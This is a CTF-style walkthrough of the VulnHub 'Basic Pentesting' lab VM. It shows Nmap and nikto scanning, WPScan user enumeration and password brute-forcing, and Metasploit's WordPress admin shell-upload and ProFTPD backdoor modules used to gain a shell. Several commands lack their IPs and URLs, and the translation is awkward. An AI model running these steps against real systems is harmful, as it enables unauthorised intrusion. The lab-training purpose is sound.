VulnHub Basic Pentesting

Published on April 02, 2018

VulnHub Basic Pentesting

Good day to all.

Many of you know about Pentest, someone even dealt with him, and someone just heard and would like to feel like a mini specialist in this field. A long time ago, or maybe not long ago, a laboratory dedicated to just that appeared on VulnHub .

ACT I - Setup

For work, I used Kali Linux and VirtualBox, and of the laboratory itself, of course.
Now we need to connect 2 cars. To make it simple: open cmd and go to the directory where VirtualBox is installed and prescribe the settings for VboxManage

Commands to configure VBoxManage
cd C:\Program Files\Oracle\VirtualBox

C:\Program Files\Oracle\VirtualBox>VBoxManage.exe dhcpserver add --netname internet --ip --netmask --lowerip --upperip --enable> 

Now in the Kali and Pentest settings we put the name of the network that we wrote in cmd

ACT II - In the beginning

Check if Kali Linux sees our lab.

We see the connection to eth0 . Now we need to find out the specific IP of our machine. For this, we will use the notorious Nmap program

IP of our laboratory

ACT III - Basic Pentesting

After Nmap scanned our virtual network, we saw that 3 ports were open in the laboratory:

  • 21 - ftp
  • 22 - ssh
  • 80 - http

We are trying to connect to port 80. To do this, open the browser (in my case, it's FireFox)

Fine! The site is working. Let's check which directories it hides from us. To do this, we will use the wonderful nikto program and look at the result.

OSVDB-3092: /secret/: This might be interesting

The secret directory should be interesting. Let's find out what she is hiding

It looks, of course, at 3 out of 10, but it can all be fixed, in the name of beauty and convenience, of course.

The most attentive, probably already guessed, and nikto with Nmap hinted us more than once.

 -  Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>
 -  Nmap scan report for vtcsec (

Let's add a name in hosts, through terminal:

# echo " vtcsec" >> /etc/hosts

Now we are ready to see all the beauty of the site

Now, like a bloodhound, we look at all the directories of the site, poke at everything that is poked and in the end we find out that the site is written in WordPress. Yes - yes nikto told us before that, but we are not looking for easy ways.

Let's Use WordPress Vulnerability Scanner - WPScan

# wpscan --url

WPScan output

WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri -
@ WPScan , @ ethicalhack3r, @erwan_lr, pvdl, @ FireFart

[+] URL:
[+] Started: Thu Mar 8 17:47:02 2018
[!] The WordPress '' file exists exposing a version number
[+] Interesting header: LINK: http://vtcsec/secret/index.php/wp-json/; rel=""
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under:
[!] Upload directory has directory listing enabled:
[!] Includes directory has directory listing enabled:
[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
[!] 6 vulnerabilities identified from the version number
[!] Title: WordPress 2.8.6-4.9 — Authenticated JavaScript File Upload
[i] Fixed in: 4.9.1
[!] Title: WordPress 1.5.0-4.9 — RSS and Atom Feed Escaping
[i] Fixed in: 4.9.1
[!] Title: WordPress 4.3.0-4.9 — HTML Language Attribute Escaping
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9 — 'newbloguser' Key Weak Hashing
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9.1 — MediaElement Cross-Site Scripting (XSS)
[i] Fixed in: 4.9.2
[!] Title: WordPress <= 4.9.4 — Application Denial of Service (DoS) (unpatched)
[+] WordPress theme in use: twentyseventeen — v1.4
[+] Name: twentyseventeen — v1.4
| Latest version: 1.4 (up to date)
| Last updated: 2017-11-16T00:00:00.000Z
| Location:
| Readme:
| Style URL:
| Referenced style.css: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
| Theme Name: Twenty Seventeen
| Theme URI:
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a…
| Author: the WordPress team
| Author URI:
[+] Enumerating plugins from passive detection…
[+] No plugins found
[+] Finished: Thu Mar 8 17:47:06 2018
[+] Requests Done: 89
[+] Memory used: 37.828 MB
[+] Elapsed time: 00:00:03

Hmmm, let's try to list all the usernames with the --enumerate u flag .

# wpscan --url --enumerate u

There is only one user. So, you can try to tweak the password.

# wpscan --url --wordlist /usr/share/wordlists/dirb/big.txt --threads 2

Unfortunately, our brutus was not successful, but we saw something interesting - an error in the login admin and password admin.

I'll have to try exploit through Metasploit

ACT IV - Admin is coming

First you need to configure Metasploit .

#/etc/init.d/postgresql start
# msfdb init

Let's get started!

# msfconsole

Need to find our exploit. We use the search command

# search admin

From the list, wp_admin_shell_upload suits us

We launch it and we carry out setup

# msf>use exploit/unix/webapp/wp_admin_shell_upload
# msf>set username admin
# msf>set password admin
# msf>set rhost
# msf>set targeturi /secret

It should be like this:


Go to the browser and go under admin / admin

ACT V - I see backdoor

Now try to access the terminal. To do this, again we need Metasploit.

# msf>use exploit/unix/ftp/proftpd_133c_backdoor

We carry out setup

# msf>set rhost

Launch! ( you can use exploit instead of run )

Tadaaam, we got access to the console.